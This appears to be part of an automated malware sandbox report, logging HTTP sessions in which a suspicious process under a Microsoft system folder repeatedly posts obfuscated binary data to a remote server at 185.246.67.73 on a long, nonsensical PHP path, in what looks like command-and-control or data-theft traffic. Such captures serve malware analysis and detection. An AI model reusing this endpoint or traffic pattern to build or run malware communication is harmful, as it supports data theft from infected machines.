                                                                                                                      Data Ascii: PRFW^BUVT^PY[ZY[YXYWWQQWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.X%-%*5]":942X78%88<R$>^%)&;.]7?#\/; ]!![ (
                                                                                                                      Dec 8, 2024 15:28:09.395766020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:09.632359982 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:09 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      35 | 192.168.2.4 | 49810 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 8, 2024 15:28:09.878664017 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:10.232054949 CET | 2584 | OUT | Data Raw: 50 5d 46 57 5e 44 55 52 54 5e 50 59 5b 50 59 5b 59 59 59 5c 57 5c 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P]FW^DURT^PY[PY[YYY\W\Q_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.0-.&9!9X94&^ ,$V0.$_%!28%"?+/; ]!![


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      36 | 192.168.2.4 | 49811 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 8, 2024 15:28:10.758836985 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:11.107023001 CET | 1904 | OUT | Data Raw: 55 5c 43 55 5e 43 55 53 54 5e 50 59 5b 5f 59 59 59 59 59 5f 57 50 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U\CU^CUST^PY[_YYYYY_WPQWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3*%*&5::-4:X/'0Z%01'89#/+ ]!![
                                                                                                                      Dec 8, 2024 15:28:12.098699093 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:12.332377911 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:11 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 3a 09 25 36 37 1d 2a 04 29 02 25 2c 3c 07 30 2b 3c 06 2a 56 27 5c 27 5f 2c 5b 38 39 23 1e 20 02 2b 00 27 03 0d 01 22 02 3c 08 2d 38 20 5a 06 10 21 14 25 11 30 03 28 05 31 5d 24 28 2e 1c 22 09 3f 41 27 04 2b 53 3e 3a 2e 5e 34 2f 05 56 31 13 32 0c 2e 1b 0c 5d 26 30 0d 1c 25 0c 2c 55 0f 1f 25 09 27 32 06 0f 23 27 2a 1d 21 30 09 19 26 0b 2a 50 35 01 2b 0f 3f 3d 24 5e 28 22 05 03 22 22 33 13 2e 28 26 01 2a 0b 23 56 27 16 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: :%67*)%,<0+<*V'\'_,[89# +'"<-8 Z!%0(1]$(."?A'+S>:.^4/V12.]&0%,U%'2#'*!0&*P5+?=$^("""3.(&*#V' S*.T3VR


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      37 | 192.168.2.4 | 49812 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 8, 2024 15:28:10.880629063 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:11.232026100 CET | 2584 | OUT | Data Raw: 50 53 43 5d 5b 49 55 50 54 5e 50 59 5b 50 59 5e 59 58 59 5b 57 5c 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PSC][IUPT^PY[PY^YXY[W\QZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y._'[*%_56#Y.9"(^,+$/2 .1& Z;[.; ]!![
                                                                                                                      Dec 8, 2024 15:28:12.200032949 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:12.432145119 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:11 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      38 | 192.168.2.4 | 49818 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 8, 2024 15:28:12.675534964 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:28:13.028896093 CET | 2584 | OUT | Data Raw: 55 5b 43 5c 5e 43 50 55 54 5e 50 59 5b 5b 59 5b 59 5a 59 58 57 55 51 5e 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U[C\^CPUT^PY[[Y[YZYXWUQ^YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.%-&2:9X"#:2Y7;*^.;$$.+135';2]"<#.+ ]!![ ,
                                                                                                                      Dec 8, 2024 15:28:14.013664007 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:14.248296022 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:13 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      39 | 192.168.2.4 | 49824 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 8, 2024 15:28:14.490434885 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:14.842083931 CET | 2584 | OUT | Data Raw: 55 59 46 56 5b 43 50 56 54 5e 50 59 5b 59 59 58 59 59 59 5b 57 56 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UYFV[CPVT^PY[YYXYYY[WVQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.[$=!Z2959]-$\";"X/8'>+&#)&+%7/</; ]!![ $
                                                                                                                      Dec 8, 2024 15:28:15.827668905 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:16.060230970 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:15 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      40 | 192.168.2.4 | 49830 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 8, 2024 15:28:16.299949884 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:16.654006958 CET | 2584 | OUT | Data Raw: 50 5a 43 51 5b 43 55 55 54 5e 50 59 5b 5a 59 5c 59 58 59 56 57 53 51 56 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PZCQ[CUUT^PY[ZY\YXYVWSQVYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.Z3[1)5!3*.%4:_.8'/%>&97,<; ]!![ (


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      41 | 192.168.2.4 | 49833 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 8, 2024 15:28:17.478996038 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:28:17.915318012 CET | 1904 | OUT | Data Raw: 50 5d 43 5c 5e 47 55 52 54 5e 50 59 5b 59 59 5c 59 58 59 58 57 53 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P]C\^GURT^PY[YY\YXYXWSQYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.$-6%_%59:B9";=,; T%>136Y2+&#<',+ ]!![ $
                                                                                                                      Dec 8, 2024 15:28:18.795914888 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:28:19.028336048 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:18 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 3a 0f 26 26 23 1d 29 14 31 04 26 3c 24 07 33 3b 33 5c 3e 33 2c 03 33 00 24 14 2d 29 30 0e 34 2c 01 00 27 3d 0d 04 20 3f 33 53 3a 38 20 5a 06 10 21 19 25 3f 3f 10 2b 5d 3a 02 32 38 35 41 21 24 2b 43 27 2e 3c 09 2a 29 39 03 23 11 3c 0a 25 13 07 54 3a 36 31 06 32 0e 01 54 31 1c 2c 55 0f 1f 26 1b 33 32 09 56 23 19 22 1d 22 09 3f 5d 26 0b 2d 0f 35 01 2f 09 2b 03 24 11 3c 54 23 02 22 31 2c 07 2c 3b 2e 04 2a 31 3b 55 25 2c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: :&&#)1&<$3;3\>3,3$-)04,'= ?3S:8 Z!%??+]:285A!$+C'.<*)9#<%T:612T1,U&32V#""?]&-5/+$<T#"1,,;.*1;U%, S*.T3VR


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      42 | 192.168.2.4 | 49837 | 185.246.67.73 | 80 | 8028 | C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Dec 8, 2024 15:28:17.698935032 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                       Dec 8, 2024 15:28:18.044586897 CET | 2584 | OUT | Data Raw: [binary request body, hex dump omitted]
                                                                                                                       Dec 8, 2024 15:28:19.037163973 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                       Dec 8, 2024 15:28:19.268606901 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:18 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                       Session ID: 43 | Source IP: 192.168.2.4 | Source Port: 49838 | Destination IP: 185.246.67.73 | Destination Port: 80 | PID: 8028 | Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                       Dec 8, 2024 15:28:19.502793074 CET | 538 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                       Dec 8, 2024 15:28:19.857165098 CET | 2584 | OUT | Data Raw: [binary request body, hex dump omitted]
                                                                                                                       Dec 8, 2024 15:28:20.866543055 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                       Dec 8, 2024 15:28:21.100059032 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:20 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                       Session ID: 44 | Source IP: 192.168.2.4 | Source Port: 49844 | Destination IP: 185.246.67.73 | Destination Port: 80 | PID: 8028 | Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                       Dec 8, 2024 15:28:21.340581894 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2580
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                       Dec 8, 2024 15:28:21.685225010 CET | 2580 | OUT | Data Raw: [binary request body, hex dump omitted]
                                                                                                                       Dec 8, 2024 15:28:22.673475981 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                       Dec 8, 2024 15:28:22.908338070 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:22 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                       Session ID: 45 | Source IP: 192.168.2.4 | Source Port: 49850 | Destination IP: 185.246.67.73 | Destination Port: 80 | PID: 8028 | Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                       Dec 8, 2024 15:28:23.158510923 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2580
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                       Dec 8, 2024 15:28:23.513469934 CET | 2580 | OUT | Data Raw: [binary request body, hex dump omitted]


                                                                                                                       Session ID: 46 | Source IP: 192.168.2.4 | Source Port: 49856 | Destination IP: 185.246.67.73 | Destination Port: 80 | PID: 8028 | Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                       Dec 8, 2024 15:28:24.165904045 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                       Dec 8, 2024 15:28:24.513361931 CET | 1904 | OUT | Data Raw: [binary request body, hex dump omitted]
                                                                                                                       Dec 8, 2024 15:28:25.562987089 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                       Dec 8, 2024 15:28:25.800937891 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:28:25 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                       Session ID: 47 | Source IP: 192.168.2.4 | Source Port: 49857 | Destination IP: 185.246.67.73 | Destination Port: 80 | PID: 8028 | Process: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                                                                       Dec 8, 2024 15:28:24.287689924 CET | 562 | OUT | POST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
